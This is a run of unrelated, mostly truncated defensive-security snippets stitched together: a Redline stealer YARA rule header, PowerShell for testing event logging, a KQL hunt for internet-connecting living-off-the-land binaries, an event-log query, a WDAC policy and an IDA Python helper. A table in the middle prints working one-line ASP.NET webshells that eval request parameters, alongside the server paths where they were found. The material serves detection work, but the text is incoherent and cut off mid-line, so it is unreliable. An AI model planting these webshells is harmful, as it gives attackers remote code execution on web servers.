rule redline_new_bin | |
{ | |
meta: | |
description = "Redline stealer" | |
author = "James_inthe_box" | |
reference = "https://app.any.run/tasks/4921d1fe-1a14-4bf2-9d27-c443353362a8" | |
date = "2021/06" | |
maltype = "Stealer" | |
strings: |
# Compile the embedded C# source below into hello.exe (written next to the
# current working directory as given to -OutputAssembly). The single-quoted
# here-string keeps the C# text verbatim; nothing inside it is expanded.
Add-Type -OutputAssembly hello.exe -TypeDefinition @'
using System;

public class Hello
{
    // Prints a greeting, then blocks until a key is read so the console stays open.
    public static void Main(string[] Args)
    {
        Console.WriteLine("Hello, world!");
        Console.Read();
    }
}
'@
# Record a UTC timestamp (XML dateTime form) before acting; it is meant to be
# reused as part of an event-log XPath time filter once the events have landed.
$DateTimeBefore = [Xml.XmlConvert]::ToString((Get-Date).ToUniversalTime(), [System.Xml.XmlDateTimeSerializationMode]::Utc)

# Perform the action whose related events we want to see. Output is discarded;
# the ISO is attached read-only so mounting leaves the image untouched.
Mount-DiskImage -ImagePath "$PWD\FeelTheBurn.iso" -StorageType ISO -Access ReadOnly | Out-Null

# Give the event log a moment to catch up before querying it.
Start-Sleep -Seconds 5
// Inspiration from https://github.com/jangeisbauer/AdvancedHunting/blob/master/hunt_for_lolbins just changed Processes to Networkevents | |
// T1218 Living off the land binaries connecting to the internet | |
// network activities with lolbins | |
DeviceNetworkEvents | |
| where RemoteIPType == 'Public' | |
| where InitiatingProcessFileName contains "Atbroker.exe" or | |
InitiatingProcessFileName contains "Bash.exe" or | |
InitiatingProcessFileName contains "Bitsadmin.exe" or | |
InitiatingProcessFileName contains "Certutil.exe" or | |
InitiatingProcessFileName contains "Cmdkey.exe" or |
<QueryList> | |
<Query Id="0" Path="Security"> | |
<Select Path="Security"> | |
*[System[(EventID='4688')]] | |
and | |
*[EventData[Data[@Name='NewProcessName']='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe']] | |
</Select> | |
<Select Path="Microsoft-Windows-PowerShell/Operational"> | |
*[System[(EventID='4104')]] | |
and |
# Occurrences | Webshell Filename | WebShell Syntax | |
---|---|---|---|
46 | C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script> | |
35 | C:\inetpub\wwwroot\aspnet_client\discover.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script> | |
21 | C:\inetpub\wwwroot\aspnet_client\shell.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["gttkomomo"],"unsafe");}</script> | |
13 | C:\inetpub\wwwroot\aspnet_client\HttpProxy.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script> | |
8 | C:\inetpub\wwwroot\aspnet_client\0QWYSEXe.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["XOrSeMr3kgWUdFf6"],"unsafe");}</script> | |
7 | C:\inetpub\wwwroot\aspnet_client\system_web\error.aspx | http://f/<script language= |
<?xml version="1.0" encoding="utf-8"?> | |
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy"> | |
<VersionEx>10.0.0.0</VersionEx> | |
<PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID> | |
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID> | |
<Rules> | |
<Rule> | |
<Option>Enabled:Unsigned System Integrity Policy</Option> | |
</Rule> | |
<Rule> |
DEBUG = True | |
def get_basic_block(ea):
    """Return the bounds of the basic block that contains address ``ea``.

    Resolves the enclosing function with ``idaapi.get_func`` and walks its
    ``idaapi.FlowChart``; the first block whose half-open range
    ``[start_ea, end_ea)`` covers ``ea`` is returned as a
    ``(start_ea, end_ea)`` tuple.

    If no block matches, the visible code falls through and the function
    returns ``None`` implicitly — NOTE(review): confirm against the rest of
    the function if it continues beyond this excerpt.
    """
    f = idaapi.get_func(ea)
    # NOTE(review): presumably get_func yields None for an address outside any
    # function; how FlowChart handles that input is not established here — verify.
    fc = idaapi.FlowChart(f)
    for block in fc:
        # Inclusive start, exclusive end: the two nested checks together are
        # equivalent to start_ea <= ea < end_ea.
        if block.start_ea <= ea:
            if block.end_ea > ea:
                return block.start_ea, block.end_ea